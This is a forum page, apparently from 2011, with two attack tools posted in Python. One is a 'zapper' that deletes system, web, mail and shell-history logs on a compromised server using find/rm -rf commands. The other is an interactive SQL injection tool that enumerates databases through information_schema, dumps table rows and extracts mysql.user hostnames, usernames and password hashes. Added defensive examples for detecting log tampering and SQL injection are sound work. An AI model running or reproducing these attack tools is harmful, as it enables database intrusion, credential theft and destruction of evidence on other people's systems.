Python / [Python] Zapper By Doddy H
July 03, 2011, 09:37:08 PM
Hello everyone.

I just made a simple zapper in Python; you just load it onto the attacked web system and it starts
erasing traces.
That said, I hadn't realized how easy Python is to use xDD

Code: python

#!usr/bin/python
#Zapper (C) Doddy Hackman

import os

paths = ["/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp","/var/log/secure","/root/.ksh_history", "/root/.bash_history","/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp","/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs","/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy","/var/log/proftpd.xferlog", "/var/log/proftpd.access_log","/var/log/httpd/error_log", "/var/log/httpsd/ssl_log","/var/log/httpsd/ssl.access_log", "/etc/mail/access","/var/log/qmail", "/var/log/smtpd", "/var/log/samba",
"/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority","/var/log/poplog", "/var/log/news.all", "/var/log/spooler","/var/log/news", "/var/log/news/news", "/var/log/news/news.all",
"/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice","/var/log/news/suck.err", "/var/log/news/suck.notice","/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks","/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log","/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs","/var/log/auth"]

comandos  = ['find / -name *.bash_history -exec rm -rf {} \;' , 'find / -name *.bash_logout -exec rm -rf {} \;','find / -name log* -exec rm -rf {} \;','find / -name  *.log -exec rm -rf {} \;','unset HISTFILE','unset SAVEHIST']

print "\n[+] Starting the zapper"

for path in paths :
try :
  os.delete(path)
except :
  pass

for cmd in comandos :
try:
  os.system(cmd)
except:
  pass

print "[+] All logs are erased\n"

#The End ?
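
Added example, not part of the original post: the script above targets login records and service logs such as `/var/log/wtmp` and `/var/log/secure`, files that normally only grow between rotations. The Python sketch below records inode and size for a watch list and reports files that disappeared, shrank, or were replaced; the function names and the temporary files in `demo()` are constructed for this example.

```python
import os
import tempfile


def snapshot(paths):
    """Map each path to (inode, size), or to None when the file is absent."""
    state = {}
    for path in paths:
        try:
            st = os.stat(path)
            state[path] = (st.st_ino, st.st_size)
        except FileNotFoundError:
            state[path] = None
    return state


def compare(before, after):
    """Return (path, finding) pairs for files present in the baseline."""
    findings = []
    for path, old in sorted(before.items()):
        if old is None:
            continue                      # not present at baseline, nothing to compare
        new = after.get(path)
        if new is None:
            findings.append((path, "deleted"))
        elif new[0] != old[0]:
            # New inode: recreated after deletion, or rotated. Correlate with
            # the rotation schedule before treating it as tampering.
            findings.append((path, "replaced"))
        elif new[1] < old[1]:
            findings.append((path, "truncated"))
    return findings


def demo():
    """Run the check against constructed files in a temporary directory."""
    with tempfile.TemporaryDirectory() as d:
        paths = [os.path.join(d, n) for n in ("wtmp", "secure", "messages")]
        for path in paths:
            with open(path, "w") as f:
                f.write("entry 1\nentry 2\n")
        before = snapshot(paths)

        os.remove(paths[0])               # wtmp disappears
        open(paths[1], "w").close()       # secure is emptied in place
        with open(paths[2], "a") as f:    # messages grows normally
            f.write("entry 3\n")

        after = snapshot(paths)
        return [(os.path.basename(p), what) for p, what in compare(before, after)]


if __name__ == "__main__":
    for name, what in demo():
        print(name, what)
```

The baseline has to be stored off the monitored host, and forwarding logs to a remote collector keeps a copy that a local deletion cannot reach.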



#520
Python / [Python] SQL Scanner 0.3
July 03, 2011, 09:36:57 PM
Well, this is a simple scanner in Python that I made for SQLI

With the following options:

  • Checks for vulnerability
  • Finds columns
  • Finds the miracle number and gets info about the DB
  • Gets tables and columns from the current DB or another external one
  • Dump users
  • Saves everything in a log with the name of the website in the /logs folder


    Code: python

    #!usr/bin/python
    #SQL Scanner 0.3 (C) Doddy Hackman 2010

    import os,sys,urllib2,re,binascii
    from urlparse import urlparse

    def clean():
    if sys.platform=="win32":
      os.system("cls")
    else:
      os.system("clear")

    def savefile(name,text):
    file = open(name,"a")
    file.write("\n"+text+"\n")
    file.close()

    def gethost(test):
    return urlparse(test).netloc

    def header() :
    print "\n--== SQL Scanner ==--\n"

    def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

    def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

    def toma(web) :
    nave = urllib2.Request(web)
    nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
    op = urllib2.build_opener()
    return op.open(nave).read()

    def bypass(bypass):
    if bypass == "--":
      return("+","--")
    elif bypass == "/*":
      return("/**/","/*")
    else:
      return("+","--")


    def dumper(web,passx,table,col1,col2):

    pass1,pass2 = bypass(passx)
    web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
    web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web)
    code1 = toma(web1+pass1+"from"+pass1+table+pass2)
    print "\n\n[+] Searching values\n\n"
    if (re.findall("K0BRA(.*?)K0BRA",code1)):
      numbers = re.findall("K0BRA(.*?)K0BRA",code1)
      numbers = numbers[0]
      print "[+] Values Found : ",numbers,"\n"
      for counter in range(0,int(numbers)):
       code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
       if (re.findall("K0BRA(.*?)K0BRA",code2)):
        c1 = re.findall("K0BRA(.*?)K0BRA",code2)
        c1 = c1[0]

        c2 = re.findall("K0BRA1(.*?)K0BRA1",code2)
        c2 = c2[0]
        print "["+col1+"] : "+c1
        print "["+col2+"] : "+c2+"\n"
        savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1)
        savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n")
    else:
      print "[-] Not Found\n"



    def mysqluser(web,passx):
        # Count the rows of mysql.user, then read Host/User/Password one row at a time.
        pass1,pass2 = bypass(passx)
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
        print "\n\n[+] Searching mysql.user\n\n"
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            print "[+] mysql.user : ON"
            savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON")
            savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n")
            print "[+] Users Found : ",numbers,"\n"
            for counter in range(0,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    host = re.findall("K0BRA(.*?)K0BRA",code2)
                    host = host[0]

                    user = re.findall("K0BRA1(.*?)K0BRA1",code2)
                    user = user[0]

                    passw = re.findall("K0BRA2(.*?)K0BRA2",code2)
                    passw = passw[0]
                    savefile("logs/"+gethost(web)+".txt","[Host] : "+host)
                    savefile("logs/"+gethost(web)+".txt","[User] : "+user)
                    savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n")
                    print "[Host] : "+host
                    print "[User] : "+user
                    print "[Pass] : "+passw+"\n"
        else:
            print "[-] Not Found\n"



    def showcolumnsdb(web,db,table,passx):
        # List the columns of one table in one database via information_schema.columns.
        db = "0x"+str(binascii.hexlify(db))
        table = "0x"+str(binascii.hexlify(table))
        pass1,pass2 = bypass(passx)
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2)
        print "\n\n[+] Searching columns in DB\n\n"
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
            savefile("logs/"+gethost(web)+".txt","[Table] : "+table)
            print "[+] information_schema : ON"
            print "[+] Columns Found : ",numbers,"\n"
            for counter in range(0,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    column = re.findall("K0BRA(.*?)K0BRA",code2)
                    column = column[0]
                    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
                    print "[Column Found] : "+column

        else:
            print "[-] Not Found\n"


    def showtablesdb(web,db,passx):
        # List the tables of one database via information_schema.tables.
        db = "0x"+str(binascii.hexlify(db))
        pass1,pass2 = bypass(passx)
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2)
        print "\n\n[+] Searching tables in DB\n\n"
        savefile("logs/"+gethost(web)+".txt","[DB] : "+db)
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            print "[+] information_schema : ON"
            print "[+] Tables Found : ",numbers,"\n"
            for counter in range(0,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2)

                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    table = re.findall("K0BRA(.*?)K0BRA",code2)
                    table = table[0]
                    print "[Table Found] : "+table
                    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
        else:
            print "[-] Not Found\n"



    def showtables(web,passx):
        # List table names from information_schema.tables, starting at row 17.
        pass1,pass2 = bypass(passx)
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
        print "\n\n[+] Searching tables\n\n"
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            print "[+] information_schema : ON"
            print "[+] Tables Found : ",numbers,"\n"
            for counter in range(17,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    table = re.findall("K0BRA(.*?)K0BRA",code2)
                    table = table[0]
                    print "[Table Found] : "+table
                    savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table)
        else:
            print "[-] Not Found\n"



    def showcolumns(tabla,web,passx):
        # List the columns of one table via information_schema.columns.
        pass1,pass2 = bypass(passx)
        tabla = "0x"+str(binascii.hexlify(tabla))
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2)
        print "\n\n[+] Searching columns\n\n"
        savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla)
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            print "[+] information_schema : ON"
            print "[+] Columns Found : ",numbers,"\n"
            for counter in range(0,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    column = re.findall("K0BRA(.*?)K0BRA",code2)
                    column = column[0]
                    print "[Column Found] : "+column
                    savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column)
        else:
            print "[-] Not Found\n"




    def showdbs(web,passx):
        # List database names from information_schema.schemata.
        pass1,pass2 = bypass(passx)
        web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web)
        web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web)
        code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
        print "\n\n[+] Searching DBS\n\n"
        if (re.findall("K0BRA(.*?)K0BRA",code1)):
            numbers = re.findall("K0BRA(.*?)K0BRA",code1)
            numbers = numbers[0]
            print "[+] information_schema : ON"
            print "[+] DBS Found : ",numbers,"\n"
            for counter in range(0,int(numbers)):
                code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2)
                if (re.findall("K0BRA(.*?)K0BRA",code2)):
                    db = re.findall("K0BRA(.*?)K0BRA",code2)
                    db = db[0]
                    print "[DB Found] : "+db
                    savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db)
        else:
            print "[-] Not Found\n"




    def menu(page,bypass):
        # Interactive menu: run the chosen action, then show the menu again.
        clean()
        header()
        print "\n[+] Target : ",page,"\n"
        print "\n[information_schema]\n\n"
        print "1 - Show tables\n"
        print "2 - Show columns of the a table\n"
        print "3 - Show databases\n"
        print "4 - Show tables from the a DB\n"
        print "5 - Show columns from the a table of the DB\n"
        print "\n[mysql.user]\n\n"
        print "6 - Show users\n"
        print "\n[Others]\n\n"
        print "7 - Show details\n"
        print "8 - Dump data\n"
        print "9 - Show log\n"
        print "10 - Change target\n"
        print "11 - Exit\n\n"
        try:
            op = input("[Option] : ")
            if op == 1:
                showtables(page,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 2:
                table = raw_input("\n\n[Table] : ")
                showcolumns(table,page,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 3:
                showdbs(page,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 4:
                db = raw_input("\n\n[DB] : ")
                showtablesdb(page,db,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 5:
                db = raw_input("\n\n[DB] : ")
                table = raw_input("\n\n[Table] : ")
                showcolumnsdb(page,db,table,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 6:
                mysqluser(page,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 7:
                more(page,bypass)
                raw_input()
                menu(page,bypass)
            elif op == 8:
                table = raw_input("\n\n[Table] : ")
                col1 = raw_input("\n\n[Column 1] : ")
                col2 = raw_input("\n\n[Column 2] : ")
                dumper(page,bypass,table,col1,col2)
                raw_input()
                menu(page,bypass)
            elif op == 9:
                os.system("start logs/"+gethost(page)+".txt")
                menu(page,bypass)
            elif op == 10:
                sta()
        except:
            menu(page,bypass)
        if op == 11:
            copyright()
     

    def more(web,passx):
        # Read user(), database() and version(), then check which system tables answer.
        pass1,pass2 = bypass(passx)
        print "\n[+] Searching more data\n"
        web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web)
        code0 = toma(web1+pass2)
        if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
            datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
            datar = re.split("K0BRA",datax[0])
            print "[+] Username :",datar[1]
            print "[+] Database :",datar[2]
            print "[+] Version :",datar[3],"\n"
            savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1])
            savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2])
            savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n")
        code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
        if (re.findall("K0BRA",code1)):
            print "[+] mysql.user : on"
            savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on")
        code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
        if (re.findall("K0BRA",code2)):
            print "[+] information_schema.tables : on"
            savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on")

    def findlength(web,passx):
        # Grow the UNION SELECT list from 2 to 29 columns until a marked number is echoed.
        pass1,pass2 = bypass(passx)
        print "\n[+] Finding columns length"
        number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))"
        for te in range(2,30):
            number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))"
            code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
            if (re.findall("K0BRA(.*?)K0BRA",code)):
                numbers = re.findall("K0BRA(.*?)K0BRA",code)
                print "[+] Column length :",te
                print "[+] Numbers",numbers,"print data"
                sql = ""
                tex = te + 1
                for sqlix in range(2,tex):
                    sql = str(sql)+","+str(sqlix)
                    sqli  = str(1)+sql
                sqla = re.sub(numbers[0],"hackman",sqli)
                savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla)
                menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)

        print "[-] Length dont found\n"
       
       
    def scan(web,passx):
        # Send a one-column UNION SELECT and look for MySQL's column-count error.
        pass1,pass2 = bypass(passx)
        print "\n\n[+] Testing vulnerability"
        code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
        if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
            print "[+] SQLI Detected"
            findlength(web,passx)
        else:
            print "[-] Not Vulnerable"
            copyright()


    def sta():
        # Entry point: ask for the page and the bypass option, then start the scan.

        clean()
        header()

        web = raw_input("\n\n[Page] : ")
        bypasx = raw_input("\n\n[Bypass] : ")
        scan(web,bypasx)

    sta()

    #The End
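
Seen from the defender's side, every request this script builds carries the same fingerprints: the hex delimiter `0x4b30425241` ("K0BRA"), the `unhex(hex(concat(` wrapper, a `union select` against `information_schema` or `mysql.user`, and a run of `limit n,1` offsets. The detector below is an added example, not part of the original post; the log format, the `+` and `/**/` separators (the `bypass()` helper is not shown in this part of the page) and the names `RULES`, `normalize` and `analyze` are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges), not real traffic.
_REQ = '%s - - [03/Jul/2011:21:40:00 +0000] "GET %s HTTP/1.1" 200 512'
SAMPLE_LOG = [
    _REQ % ("203.0.113.7", "/news.php?id=-1+union+select+1,unhex(hex(concat("
            "0x4b30425241,count(*),0x4b30425241))),3+from+information_schema.tables"),
] + [
    _REQ % ("203.0.113.7", "/news.php?id=-1/**/union/**/select/**/1,unhex(hex(concat("
            "0x4B30425241,table_name,0x4B30425241))),3/**/from/**/"
            "information_schema.tables/**/limit/**/%d,1" % n)
    for n in range(3)
] + [
    _REQ % ("198.51.100.20", "/search.php?q=student+union+select+committee"),
    _REQ % ("198.51.100.20", "/news.php?id=42"),
]

RULES = {
    "marker": re.compile(r"0x4b30425241", re.I),  # hex("K0BRA") delimiter from the page
    "wrapper": re.compile(r"unhex\s*\(\s*hex\s*\(\s*concat", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "metadata": re.compile(r"\b(?:information_schema\.\w+|mysql\.user)\b", re.I),
}
LIMIT = re.compile(r"\blimit\s+(\d+)\s*,\s*1\b", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP')

def normalize(url):
    """URL-decode and turn '+' and /**/ separators into single spaces."""
    text = re.sub(r"/\*.*?\*/", " ", unquote_plus(url))
    return re.sub(r"\s+", " ", text)

def analyze(lines, min_rows=3):
    """Per client: matched rules, LIMIT n,1 row enumeration, and a verdict."""
    seen = defaultdict(lambda: {"rules": set(), "offsets": set()})
    for m in filter(None, map(REQUEST.match, lines)):
        ip, query = m.group(1), normalize(m.group(2))
        matched = {name for name, rx in RULES.items() if rx.search(query)}
        if matched:
            seen[ip]["rules"] |= matched
            seen[ip]["offsets"].update(int(n) for n in LIMIT.findall(query))
    report = {}
    for ip, hit in seen.items():
        rules = sorted(hit["rules"])
        flagged = "marker" in rules or len(rules) >= 2  # one keyword alone is weak
        report[ip] = {"rules": rules, "flagged": flagged,
                      "row_enumeration": len(hit["offsets"]) >= min_rows}
    return report
```

Requiring either the marker or two independent rules keeps an ordinary search for "union select" from being flagged, while the enumeration flag separates a single probe from a table being read row by row.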